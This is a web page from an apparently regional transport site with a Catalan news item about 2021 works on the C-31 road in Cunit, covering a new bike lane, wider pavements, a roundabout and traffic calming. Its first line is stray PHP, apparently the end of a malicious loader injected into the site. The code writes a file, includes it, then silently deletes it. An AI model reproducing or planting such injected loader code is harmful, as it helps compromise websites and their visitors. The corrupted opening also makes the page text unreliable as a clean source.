");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> La Generalitat millora la integració urbana i la seguretat de la C-31 a Cunit i afavoreix la mobilitat de vianants i ciclistes
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

La Generalitat millora la integració urbana i la seguretat de la C-31 a Cunit i afavoreix la mobilitat de vianants i ciclistes (09/06/2021)

El Departament de la Vicepresidència i de Polítiques Digitals i Territori ha començat les obres per al condicionament de la C-31 al seu pas pel nucli urbà de Cunit. Els treballs permetran millorar la integració urbana de la carretera i afavorir la mobilitat i la seguretat viària en aquest entorn, amb una especial atenció a vianants i ciclistes. Les obres, que suposaran una inversió d’1,7 MEUR, tindran un termini d’execució de sis mesos.

Al seu pas per Cunit, la C-31 registra una intensitat mitjana diària de prop de 20.200 vehicles. Els treballs abastaran un tram de prop de 3 quilòmetres de la carretera i inclouran tot un conjunt d’actuacions de millora de la mobilitat i la seguretat viària. Els objectius d’aquesta actuació són pacificar el trànsit, especialment en les proximitats dels passos de vianants, evitar el creuament de vianants fora dels passos habilitats i proporcionar a les persones usuàries espais adequats i més segurs.

Així, les principals millores que es duran a terme corresponen a:

• Creació d’un carril bici d’1,7 quilòmetres, bidireccional, de 2 metres d’amplada.

• Ampliació de voreres existents, i creació de nous trams de vorera en diversos punts de l’àmbit de les obres.

• Millora dels passos de vianants existents i creació de nous.

• Ampliació de la passareŀla de vianants i bicicletes en el límit entre el municipi de Cunit i Cubelles per al pas del torrent existent.

• Construcció d’un separador de fluxos a la mitjana del tronc de la C-31, amb barreres de contenció de vehicles, en prop d’un quilòmetre.

• Reducció de l’amplada dels carrils de la calçada central de la C-31, dels 3,5 metres actuals als 3,2 metres previstos, per a pacificar el trànsit.

• Construcció d’una nova rotonda en substitució de l’actual intersecció en T de la C-31 amb el carrer de Montblanc.

• Reordenació d’accessos als carrils laterals i carrers perpendiculars.

• Adequació de la senyalització vertical de codi i d’orientació.

• Instaŀlació de enllumenat a la nova rotonda del carrer Montblanc i en els trams de carril bici i vorera on actualment no n’hi hagi

• Rehabilitació i millora del ferm de les calçades.
Afectacions al trànsit

La mobilitat estarà assegurada en tot moment i les possibles afectacions al trànsit que no es puguin evitar tindran en compte les hores punta i els moments d’alta intensitat com divendres o diumenges a la tarda i es coordinaran amb l’Ajuntament de Cunit. També cal indicar que les principals afectacions es preveuen passada la temporada estival.

Font: Departament de la Vicepresidència i de Polítiques Digitals i Territori

La Generalitat millora la integració urbana i la seguretat de la C-31 a Cunit i afavoreix la mobilitat de vianants i ciclistes

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona